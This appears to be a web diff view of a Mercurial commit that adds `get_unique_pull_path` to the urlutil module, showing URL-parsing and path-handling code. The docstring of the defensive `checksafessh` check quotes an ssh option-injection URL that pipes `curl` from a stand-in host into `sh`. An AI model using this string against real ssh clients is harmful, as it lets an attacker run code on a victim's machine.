##// END OF EJS Templates
urlutil: add a new `get_unique_pull_path`...
marmoute -
r47698:1998a831 default
parent child Browse files
Show More
@@ -1,719 +1,735
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
32 def getport(port):
32 def getport(port):
33 # type: (Union[bytes, int]) -> int
33 # type: (Union[bytes, int]) -> int
34 """Return the port for a given network service.
34 """Return the port for a given network service.
35
35
36 If port is an integer, it's returned as is. If it's a string, it's
36 If port is an integer, it's returned as is. If it's a string, it's
37 looked up using socket.getservbyname(). If there's no matching
37 looked up using socket.getservbyname(). If there's no matching
38 service, error.Abort is raised.
38 service, error.Abort is raised.
39 """
39 """
40 try:
40 try:
41 return int(port)
41 return int(port)
42 except ValueError:
42 except ValueError:
43 pass
43 pass
44
44
45 try:
45 try:
46 return socket.getservbyname(pycompat.sysstr(port))
46 return socket.getservbyname(pycompat.sysstr(port))
47 except socket.error:
47 except socket.error:
48 raise error.Abort(
48 raise error.Abort(
49 _(b"no port number associated with service '%s'") % port
49 _(b"no port number associated with service '%s'") % port
50 )
50 )
51
51
52
52
53 class url(object):
53 class url(object):
54 r"""Reliable URL parser.
54 r"""Reliable URL parser.
55
55
56 This parses URLs and provides attributes for the following
56 This parses URLs and provides attributes for the following
57 components:
57 components:
58
58
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
60
60
61 Missing components are set to None. The only exception is
61 Missing components are set to None. The only exception is
62 fragment, which is set to '' if present but empty.
62 fragment, which is set to '' if present but empty.
63
63
64 If parsefragment is False, fragment is included in query. If
64 If parsefragment is False, fragment is included in query. If
65 parsequery is False, query is included in path. If both are
65 parsequery is False, query is included in path. If both are
66 False, both fragment and query are included in path.
66 False, both fragment and query are included in path.
67
67
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
69
69
70 Note that for backward compatibility reasons, bundle URLs do not
70 Note that for backward compatibility reasons, bundle URLs do not
71 take host names. That means 'bundle://../' has a path of '../'.
71 take host names. That means 'bundle://../' has a path of '../'.
72
72
73 Examples:
73 Examples:
74
74
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
79 >>> url(b'file:///home/joe/repo')
79 >>> url(b'file:///home/joe/repo')
80 <url scheme: 'file', path: '/home/joe/repo'>
80 <url scheme: 'file', path: '/home/joe/repo'>
81 >>> url(b'file:///c:/temp/foo/')
81 >>> url(b'file:///c:/temp/foo/')
82 <url scheme: 'file', path: 'c:/temp/foo/'>
82 <url scheme: 'file', path: 'c:/temp/foo/'>
83 >>> url(b'bundle:foo')
83 >>> url(b'bundle:foo')
84 <url scheme: 'bundle', path: 'foo'>
84 <url scheme: 'bundle', path: 'foo'>
85 >>> url(b'bundle://../foo')
85 >>> url(b'bundle://../foo')
86 <url scheme: 'bundle', path: '../foo'>
86 <url scheme: 'bundle', path: '../foo'>
87 >>> url(br'c:\foo\bar')
87 >>> url(br'c:\foo\bar')
88 <url path: 'c:\\foo\\bar'>
88 <url path: 'c:\\foo\\bar'>
89 >>> url(br'\\blah\blah\blah')
89 >>> url(br'\\blah\blah\blah')
90 <url path: '\\\\blah\\blah\\blah'>
90 <url path: '\\\\blah\\blah\\blah'>
91 >>> url(br'\\blah\blah\blah#baz')
91 >>> url(br'\\blah\blah\blah#baz')
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
93 >>> url(br'file:///C:\users\me')
93 >>> url(br'file:///C:\users\me')
94 <url scheme: 'file', path: 'C:\\users\\me'>
94 <url scheme: 'file', path: 'C:\\users\\me'>
95
95
96 Authentication credentials:
96 Authentication credentials:
97
97
98 >>> url(b'ssh://joe:xyz@x/repo')
98 >>> url(b'ssh://joe:xyz@x/repo')
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
100 >>> url(b'ssh://joe@x/repo')
100 >>> url(b'ssh://joe@x/repo')
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
102
102
103 Query strings and fragments:
103 Query strings and fragments:
104
104
105 >>> url(b'http://host/a?b#c')
105 >>> url(b'http://host/a?b#c')
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
109
109
110 Empty path:
110 Empty path:
111
111
112 >>> url(b'')
112 >>> url(b'')
113 <url path: ''>
113 <url path: ''>
114 >>> url(b'#a')
114 >>> url(b'#a')
115 <url path: '', fragment: 'a'>
115 <url path: '', fragment: 'a'>
116 >>> url(b'http://host/')
116 >>> url(b'http://host/')
117 <url scheme: 'http', host: 'host', path: ''>
117 <url scheme: 'http', host: 'host', path: ''>
118 >>> url(b'http://host/#a')
118 >>> url(b'http://host/#a')
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
120
120
121 Only scheme:
121 Only scheme:
122
122
123 >>> url(b'http:')
123 >>> url(b'http:')
124 <url scheme: 'http'>
124 <url scheme: 'http'>
125 """
125 """
126
126
127 _safechars = b"!~*'()+"
127 _safechars = b"!~*'()+"
128 _safepchars = b"/!~*'()+:\\"
128 _safepchars = b"/!~*'()+:\\"
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
130
130
131 def __init__(self, path, parsequery=True, parsefragment=True):
131 def __init__(self, path, parsequery=True, parsefragment=True):
132 # type: (bytes, bool, bool) -> None
132 # type: (bytes, bool, bool) -> None
133 # We slowly chomp away at path until we have only the path left
133 # We slowly chomp away at path until we have only the path left
134 self.scheme = self.user = self.passwd = self.host = None
134 self.scheme = self.user = self.passwd = self.host = None
135 self.port = self.path = self.query = self.fragment = None
135 self.port = self.path = self.query = self.fragment = None
136 self._localpath = True
136 self._localpath = True
137 self._hostport = b''
137 self._hostport = b''
138 self._origpath = path
138 self._origpath = path
139
139
140 if parsefragment and b'#' in path:
140 if parsefragment and b'#' in path:
141 path, self.fragment = path.split(b'#', 1)
141 path, self.fragment = path.split(b'#', 1)
142
142
143 # special case for Windows drive letters and UNC paths
143 # special case for Windows drive letters and UNC paths
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
145 self.path = path
145 self.path = path
146 return
146 return
147
147
148 # For compatibility reasons, we can't handle bundle paths as
148 # For compatibility reasons, we can't handle bundle paths as
149 # normal URLS
149 # normal URLS
150 if path.startswith(b'bundle:'):
150 if path.startswith(b'bundle:'):
151 self.scheme = b'bundle'
151 self.scheme = b'bundle'
152 path = path[7:]
152 path = path[7:]
153 if path.startswith(b'//'):
153 if path.startswith(b'//'):
154 path = path[2:]
154 path = path[2:]
155 self.path = path
155 self.path = path
156 return
156 return
157
157
158 if self._matchscheme(path):
158 if self._matchscheme(path):
159 parts = path.split(b':', 1)
159 parts = path.split(b':', 1)
160 if parts[0]:
160 if parts[0]:
161 self.scheme, path = parts
161 self.scheme, path = parts
162 self._localpath = False
162 self._localpath = False
163
163
164 if not path:
164 if not path:
165 path = None
165 path = None
166 if self._localpath:
166 if self._localpath:
167 self.path = b''
167 self.path = b''
168 return
168 return
169 else:
169 else:
170 if self._localpath:
170 if self._localpath:
171 self.path = path
171 self.path = path
172 return
172 return
173
173
174 if parsequery and b'?' in path:
174 if parsequery and b'?' in path:
175 path, self.query = path.split(b'?', 1)
175 path, self.query = path.split(b'?', 1)
176 if not path:
176 if not path:
177 path = None
177 path = None
178 if not self.query:
178 if not self.query:
179 self.query = None
179 self.query = None
180
180
181 # // is required to specify a host/authority
181 # // is required to specify a host/authority
182 if path and path.startswith(b'//'):
182 if path and path.startswith(b'//'):
183 parts = path[2:].split(b'/', 1)
183 parts = path[2:].split(b'/', 1)
184 if len(parts) > 1:
184 if len(parts) > 1:
185 self.host, path = parts
185 self.host, path = parts
186 else:
186 else:
187 self.host = parts[0]
187 self.host = parts[0]
188 path = None
188 path = None
189 if not self.host:
189 if not self.host:
190 self.host = None
190 self.host = None
191 # path of file:///d is /d
191 # path of file:///d is /d
192 # path of file:///d:/ is d:/, not /d:/
192 # path of file:///d:/ is d:/, not /d:/
193 if path and not hasdriveletter(path):
193 if path and not hasdriveletter(path):
194 path = b'/' + path
194 path = b'/' + path
195
195
196 if self.host and b'@' in self.host:
196 if self.host and b'@' in self.host:
197 self.user, self.host = self.host.rsplit(b'@', 1)
197 self.user, self.host = self.host.rsplit(b'@', 1)
198 if b':' in self.user:
198 if b':' in self.user:
199 self.user, self.passwd = self.user.split(b':', 1)
199 self.user, self.passwd = self.user.split(b':', 1)
200 if not self.host:
200 if not self.host:
201 self.host = None
201 self.host = None
202
202
203 # Don't split on colons in IPv6 addresses without ports
203 # Don't split on colons in IPv6 addresses without ports
204 if (
204 if (
205 self.host
205 self.host
206 and b':' in self.host
206 and b':' in self.host
207 and not (
207 and not (
208 self.host.startswith(b'[') and self.host.endswith(b']')
208 self.host.startswith(b'[') and self.host.endswith(b']')
209 )
209 )
210 ):
210 ):
211 self._hostport = self.host
211 self._hostport = self.host
212 self.host, self.port = self.host.rsplit(b':', 1)
212 self.host, self.port = self.host.rsplit(b':', 1)
213 if not self.host:
213 if not self.host:
214 self.host = None
214 self.host = None
215
215
216 if (
216 if (
217 self.host
217 self.host
218 and self.scheme == b'file'
218 and self.scheme == b'file'
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
220 ):
220 ):
221 raise error.Abort(
221 raise error.Abort(
222 _(b'file:// URLs can only refer to localhost')
222 _(b'file:// URLs can only refer to localhost')
223 )
223 )
224
224
225 self.path = path
225 self.path = path
226
226
227 # leave the query string escaped
227 # leave the query string escaped
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
229 v = getattr(self, a)
229 v = getattr(self, a)
230 if v is not None:
230 if v is not None:
231 setattr(self, a, urlreq.unquote(v))
231 setattr(self, a, urlreq.unquote(v))
232
232
233 def copy(self):
233 def copy(self):
234 u = url(b'temporary useless value')
234 u = url(b'temporary useless value')
235 u.path = self.path
235 u.path = self.path
236 u.scheme = self.scheme
236 u.scheme = self.scheme
237 u.user = self.user
237 u.user = self.user
238 u.passwd = self.passwd
238 u.passwd = self.passwd
239 u.host = self.host
239 u.host = self.host
240 u.path = self.path
240 u.path = self.path
241 u.query = self.query
241 u.query = self.query
242 u.fragment = self.fragment
242 u.fragment = self.fragment
243 u._localpath = self._localpath
243 u._localpath = self._localpath
244 u._hostport = self._hostport
244 u._hostport = self._hostport
245 u._origpath = self._origpath
245 u._origpath = self._origpath
246 return u
246 return u
247
247
248 @encoding.strmethod
248 @encoding.strmethod
249 def __repr__(self):
249 def __repr__(self):
250 attrs = []
250 attrs = []
251 for a in (
251 for a in (
252 b'scheme',
252 b'scheme',
253 b'user',
253 b'user',
254 b'passwd',
254 b'passwd',
255 b'host',
255 b'host',
256 b'port',
256 b'port',
257 b'path',
257 b'path',
258 b'query',
258 b'query',
259 b'fragment',
259 b'fragment',
260 ):
260 ):
261 v = getattr(self, a)
261 v = getattr(self, a)
262 if v is not None:
262 if v is not None:
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
264 return b'<url %s>' % b', '.join(attrs)
264 return b'<url %s>' % b', '.join(attrs)
265
265
266 def __bytes__(self):
266 def __bytes__(self):
267 r"""Join the URL's components back into a URL string.
267 r"""Join the URL's components back into a URL string.
268
268
269 Examples:
269 Examples:
270
270
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
274 'http://user:pw@host:80/?foo=bar&baz=42'
274 'http://user:pw@host:80/?foo=bar&baz=42'
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
276 'http://user:pw@host:80/?foo=bar%3dbaz'
276 'http://user:pw@host:80/?foo=bar%3dbaz'
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
278 'ssh://user:pw@[::1]:2200//home/joe#'
278 'ssh://user:pw@[::1]:2200//home/joe#'
279 >>> bytes(url(b'http://localhost:80//'))
279 >>> bytes(url(b'http://localhost:80//'))
280 'http://localhost:80//'
280 'http://localhost:80//'
281 >>> bytes(url(b'http://localhost:80/'))
281 >>> bytes(url(b'http://localhost:80/'))
282 'http://localhost:80/'
282 'http://localhost:80/'
283 >>> bytes(url(b'http://localhost:80'))
283 >>> bytes(url(b'http://localhost:80'))
284 'http://localhost:80/'
284 'http://localhost:80/'
285 >>> bytes(url(b'bundle:foo'))
285 >>> bytes(url(b'bundle:foo'))
286 'bundle:foo'
286 'bundle:foo'
287 >>> bytes(url(b'bundle://../foo'))
287 >>> bytes(url(b'bundle://../foo'))
288 'bundle:../foo'
288 'bundle:../foo'
289 >>> bytes(url(b'path'))
289 >>> bytes(url(b'path'))
290 'path'
290 'path'
291 >>> bytes(url(b'file:///tmp/foo/bar'))
291 >>> bytes(url(b'file:///tmp/foo/bar'))
292 'file:///tmp/foo/bar'
292 'file:///tmp/foo/bar'
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
294 'file:///c:/tmp/foo/bar'
294 'file:///c:/tmp/foo/bar'
295 >>> print(url(br'bundle:foo\bar'))
295 >>> print(url(br'bundle:foo\bar'))
296 bundle:foo\bar
296 bundle:foo\bar
297 >>> print(url(br'file:///D:\data\hg'))
297 >>> print(url(br'file:///D:\data\hg'))
298 file:///D:\data\hg
298 file:///D:\data\hg
299 """
299 """
300 if self._localpath:
300 if self._localpath:
301 s = self.path
301 s = self.path
302 if self.scheme == b'bundle':
302 if self.scheme == b'bundle':
303 s = b'bundle:' + s
303 s = b'bundle:' + s
304 if self.fragment:
304 if self.fragment:
305 s += b'#' + self.fragment
305 s += b'#' + self.fragment
306 return s
306 return s
307
307
308 s = self.scheme + b':'
308 s = self.scheme + b':'
309 if self.user or self.passwd or self.host:
309 if self.user or self.passwd or self.host:
310 s += b'//'
310 s += b'//'
311 elif self.scheme and (
311 elif self.scheme and (
312 not self.path
312 not self.path
313 or self.path.startswith(b'/')
313 or self.path.startswith(b'/')
314 or hasdriveletter(self.path)
314 or hasdriveletter(self.path)
315 ):
315 ):
316 s += b'//'
316 s += b'//'
317 if hasdriveletter(self.path):
317 if hasdriveletter(self.path):
318 s += b'/'
318 s += b'/'
319 if self.user:
319 if self.user:
320 s += urlreq.quote(self.user, safe=self._safechars)
320 s += urlreq.quote(self.user, safe=self._safechars)
321 if self.passwd:
321 if self.passwd:
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
323 if self.user or self.passwd:
323 if self.user or self.passwd:
324 s += b'@'
324 s += b'@'
325 if self.host:
325 if self.host:
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
327 s += urlreq.quote(self.host)
327 s += urlreq.quote(self.host)
328 else:
328 else:
329 s += self.host
329 s += self.host
330 if self.port:
330 if self.port:
331 s += b':' + urlreq.quote(self.port)
331 s += b':' + urlreq.quote(self.port)
332 if self.host:
332 if self.host:
333 s += b'/'
333 s += b'/'
334 if self.path:
334 if self.path:
335 # TODO: similar to the query string, we should not unescape the
335 # TODO: similar to the query string, we should not unescape the
336 # path when we store it, the path might contain '%2f' = '/',
336 # path when we store it, the path might contain '%2f' = '/',
337 # which we should *not* escape.
337 # which we should *not* escape.
338 s += urlreq.quote(self.path, safe=self._safepchars)
338 s += urlreq.quote(self.path, safe=self._safepchars)
339 if self.query:
339 if self.query:
340 # we store the query in escaped form.
340 # we store the query in escaped form.
341 s += b'?' + self.query
341 s += b'?' + self.query
342 if self.fragment is not None:
342 if self.fragment is not None:
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
344 return s
344 return s
345
345
346 __str__ = encoding.strmethod(__bytes__)
346 __str__ = encoding.strmethod(__bytes__)
347
347
348 def authinfo(self):
348 def authinfo(self):
349 user, passwd = self.user, self.passwd
349 user, passwd = self.user, self.passwd
350 try:
350 try:
351 self.user, self.passwd = None, None
351 self.user, self.passwd = None, None
352 s = bytes(self)
352 s = bytes(self)
353 finally:
353 finally:
354 self.user, self.passwd = user, passwd
354 self.user, self.passwd = user, passwd
355 if not self.user:
355 if not self.user:
356 return (s, None)
356 return (s, None)
357 # authinfo[1] is passed to urllib2 password manager, and its
357 # authinfo[1] is passed to urllib2 password manager, and its
358 # URIs must not contain credentials. The host is passed in the
358 # URIs must not contain credentials. The host is passed in the
359 # URIs list because Python < 2.4.3 uses only that to search for
359 # URIs list because Python < 2.4.3 uses only that to search for
360 # a password.
360 # a password.
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
362
362
363 def isabs(self):
363 def isabs(self):
364 if self.scheme and self.scheme != b'file':
364 if self.scheme and self.scheme != b'file':
365 return True # remote URL
365 return True # remote URL
366 if hasdriveletter(self.path):
366 if hasdriveletter(self.path):
367 return True # absolute for our purposes - can't be joined()
367 return True # absolute for our purposes - can't be joined()
368 if self.path.startswith(br'\\'):
368 if self.path.startswith(br'\\'):
369 return True # Windows UNC path
369 return True # Windows UNC path
370 if self.path.startswith(b'/'):
370 if self.path.startswith(b'/'):
371 return True # POSIX-style
371 return True # POSIX-style
372 return False
372 return False
373
373
374 def localpath(self):
374 def localpath(self):
375 # type: () -> bytes
375 # type: () -> bytes
376 if self.scheme == b'file' or self.scheme == b'bundle':
376 if self.scheme == b'file' or self.scheme == b'bundle':
377 path = self.path or b'/'
377 path = self.path or b'/'
378 # For Windows, we need to promote hosts containing drive
378 # For Windows, we need to promote hosts containing drive
379 # letters to paths with drive letters.
379 # letters to paths with drive letters.
380 if hasdriveletter(self._hostport):
380 if hasdriveletter(self._hostport):
381 path = self._hostport + b'/' + self.path
381 path = self._hostport + b'/' + self.path
382 elif (
382 elif (
383 self.host is not None and self.path and not hasdriveletter(path)
383 self.host is not None and self.path and not hasdriveletter(path)
384 ):
384 ):
385 path = b'/' + path
385 path = b'/' + path
386 return path
386 return path
387 return self._origpath
387 return self._origpath
388
388
389 def islocal(self):
389 def islocal(self):
390 '''whether localpath will return something that posixfile can open'''
390 '''whether localpath will return something that posixfile can open'''
391 return (
391 return (
392 not self.scheme
392 not self.scheme
393 or self.scheme == b'file'
393 or self.scheme == b'file'
394 or self.scheme == b'bundle'
394 or self.scheme == b'bundle'
395 )
395 )
396
396
397
397
398 def hasscheme(path):
398 def hasscheme(path):
399 # type: (bytes) -> bool
399 # type: (bytes) -> bool
400 return bool(url(path).scheme) # cast to help pytype
400 return bool(url(path).scheme) # cast to help pytype
401
401
402
402
403 def hasdriveletter(path):
403 def hasdriveletter(path):
404 # type: (bytes) -> bool
404 # type: (bytes) -> bool
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
406
407
407
408 def urllocalpath(path):
408 def urllocalpath(path):
409 # type: (bytes) -> bytes
409 # type: (bytes) -> bytes
410 return url(path, parsequery=False, parsefragment=False).localpath()
410 return url(path, parsequery=False, parsefragment=False).localpath()
411
411
412
412
413 def checksafessh(path):
413 def checksafessh(path):
414 # type: (bytes) -> None
414 # type: (bytes) -> None
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
416
416
417 This is a sanity check for ssh urls. ssh will parse the first item as
417 This is a sanity check for ssh urls. ssh will parse the first item as
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
419 Let's prevent these potentially exploited urls entirely and warn the
419 Let's prevent these potentially exploited urls entirely and warn the
420 user.
420 user.
421
421
422 Raises an error.Abort when the url is unsafe.
422 Raises an error.Abort when the url is unsafe.
423 """
423 """
424 path = urlreq.unquote(path)
424 path = urlreq.unquote(path)
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
426 raise error.Abort(
426 raise error.Abort(
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
428 )
428 )
429
429
430
430
431 def hidepassword(u):
431 def hidepassword(u):
432 # type: (bytes) -> bytes
432 # type: (bytes) -> bytes
433 '''hide user credential in a url string'''
433 '''hide user credential in a url string'''
434 u = url(u)
434 u = url(u)
435 if u.passwd:
435 if u.passwd:
436 u.passwd = b'***'
436 u.passwd = b'***'
437 return bytes(u)
437 return bytes(u)
438
438
439
439
440 def removeauth(u):
440 def removeauth(u):
441 # type: (bytes) -> bytes
441 # type: (bytes) -> bytes
442 '''remove all authentication information from a url string'''
442 '''remove all authentication information from a url string'''
443 u = url(u)
443 u = url(u)
444 u.user = u.passwd = None
444 u.user = u.passwd = None
445 return bytes(u)
445 return bytes(u)
446
446
447
447
448 def get_push_paths(repo, ui, dests):
448 def get_push_paths(repo, ui, dests):
449 """yields all the `path` selected as push destination by `dests`"""
449 """yields all the `path` selected as push destination by `dests`"""
450 if not dests:
450 if not dests:
451 if b'default-push' in ui.paths:
451 if b'default-push' in ui.paths:
452 yield ui.paths[b'default-push']
452 yield ui.paths[b'default-push']
453 elif b'default' in ui.paths:
453 elif b'default' in ui.paths:
454 yield ui.paths[b'default']
454 yield ui.paths[b'default']
455 else:
455 else:
456 raise error.ConfigError(
456 raise error.ConfigError(
457 _(b'default repository not configured!'),
457 _(b'default repository not configured!'),
458 hint=_(b"see 'hg help config.paths'"),
458 hint=_(b"see 'hg help config.paths'"),
459 )
459 )
460 else:
460 else:
461 for dest in dests:
461 for dest in dests:
462 yield ui.getpath(dest)
462 yield ui.getpath(dest)
463
463
464
464
465 def get_pull_paths(repo, ui, sources, default_branches=()):
465 def get_pull_paths(repo, ui, sources, default_branches=()):
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
467 if not sources:
467 if not sources:
468 sources = [b'default']
468 sources = [b'default']
469 for source in sources:
469 for source in sources:
470 url = ui.expandpath(source)
470 url = ui.expandpath(source)
471 yield parseurl(url, default_branches)
471 yield parseurl(url, default_branches)
472
472
473
473
474 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
475 """return a unique `(path, branch)` or abort if multiple are found
476
477 This is useful for command and action that does not support multiple
478 destination (yet).
479
480 Note that for now, we cannot get multiple destination so this function is "trivial".
481
482 The `action` parameter will be used for the error message.
483 """
484 if source is None:
485 source = b'default'
486 url = ui.expandpath(source)
487 return parseurl(url, default_branches)
488
489
474 def get_clone_path(ui, source, default_branches=()):
490 def get_clone_path(ui, source, default_branches=()):
475 """return the `(origsource, path, branch)` selected as clone source"""
491 """return the `(origsource, path, branch)` selected as clone source"""
476 url = ui.expandpath(source)
492 url = ui.expandpath(source)
477 path, branch = parseurl(url, default_branches)
493 path, branch = parseurl(url, default_branches)
478 return url, path, branch
494 return url, path, branch
479
495
480
496
481 def parseurl(path, branches=None):
497 def parseurl(path, branches=None):
482 '''parse url#branch, returning (url, (branch, branches))'''
498 '''parse url#branch, returning (url, (branch, branches))'''
483 u = url(path)
499 u = url(path)
484 branch = None
500 branch = None
485 if u.fragment:
501 if u.fragment:
486 branch = u.fragment
502 branch = u.fragment
487 u.fragment = None
503 u.fragment = None
488 return bytes(u), (branch, branches or [])
504 return bytes(u), (branch, branches or [])
489
505
490
506
491 class paths(dict):
507 class paths(dict):
492 """Represents a collection of paths and their configs.
508 """Represents a collection of paths and their configs.
493
509
494 Data is initially derived from ui instances and the config files they have
510 Data is initially derived from ui instances and the config files they have
495 loaded.
511 loaded.
496 """
512 """
497
513
498 def __init__(self, ui):
514 def __init__(self, ui):
499 dict.__init__(self)
515 dict.__init__(self)
500
516
501 for name, loc in ui.configitems(b'paths', ignoresub=True):
517 for name, loc in ui.configitems(b'paths', ignoresub=True):
502 # No location is the same as not existing.
518 # No location is the same as not existing.
503 if not loc:
519 if not loc:
504 continue
520 continue
505 loc, sub_opts = ui.configsuboptions(b'paths', name)
521 loc, sub_opts = ui.configsuboptions(b'paths', name)
506 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
522 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
507
523
508 for name, p in sorted(self.items()):
524 for name, p in sorted(self.items()):
509 p.chain_path(ui, self)
525 p.chain_path(ui, self)
510
526
511 def getpath(self, ui, name, default=None):
527 def getpath(self, ui, name, default=None):
512 """Return a ``path`` from a string, falling back to default.
528 """Return a ``path`` from a string, falling back to default.
513
529
514 ``name`` can be a named path or locations. Locations are filesystem
530 ``name`` can be a named path or locations. Locations are filesystem
515 paths or URIs.
531 paths or URIs.
516
532
517 Returns None if ``name`` is not a registered path, a URI, or a local
533 Returns None if ``name`` is not a registered path, a URI, or a local
518 path to a repo.
534 path to a repo.
519 """
535 """
520 # Only fall back to default if no path was requested.
536 # Only fall back to default if no path was requested.
521 if name is None:
537 if name is None:
522 if not default:
538 if not default:
523 default = ()
539 default = ()
524 elif not isinstance(default, (tuple, list)):
540 elif not isinstance(default, (tuple, list)):
525 default = (default,)
541 default = (default,)
526 for k in default:
542 for k in default:
527 try:
543 try:
528 return self[k]
544 return self[k]
529 except KeyError:
545 except KeyError:
530 continue
546 continue
531 return None
547 return None
532
548
533 # Most likely empty string.
549 # Most likely empty string.
534 # This may need to raise in the future.
550 # This may need to raise in the future.
535 if not name:
551 if not name:
536 return None
552 return None
537
553
538 try:
554 try:
539 return self[name]
555 return self[name]
540 except KeyError:
556 except KeyError:
541 # Try to resolve as a local path or URI.
557 # Try to resolve as a local path or URI.
542 try:
558 try:
543 # we pass the ui instance are warning might need to be issued
559 # we pass the ui instance are warning might need to be issued
544 return path(ui, None, rawloc=name)
560 return path(ui, None, rawloc=name)
545 except ValueError:
561 except ValueError:
546 raise error.RepoError(_(b'repository %s does not exist') % name)
562 raise error.RepoError(_(b'repository %s does not exist') % name)
547
563
548
564
549 _pathsuboptions = {}
565 _pathsuboptions = {}
550
566
551
567
552 def pathsuboption(option, attr):
568 def pathsuboption(option, attr):
553 """Decorator used to declare a path sub-option.
569 """Decorator used to declare a path sub-option.
554
570
555 Arguments are the sub-option name and the attribute it should set on
571 Arguments are the sub-option name and the attribute it should set on
556 ``path`` instances.
572 ``path`` instances.
557
573
558 The decorated function will receive as arguments a ``ui`` instance,
574 The decorated function will receive as arguments a ``ui`` instance,
559 ``path`` instance, and the string value of this option from the config.
575 ``path`` instance, and the string value of this option from the config.
560 The function should return the value that will be set on the ``path``
576 The function should return the value that will be set on the ``path``
561 instance.
577 instance.
562
578
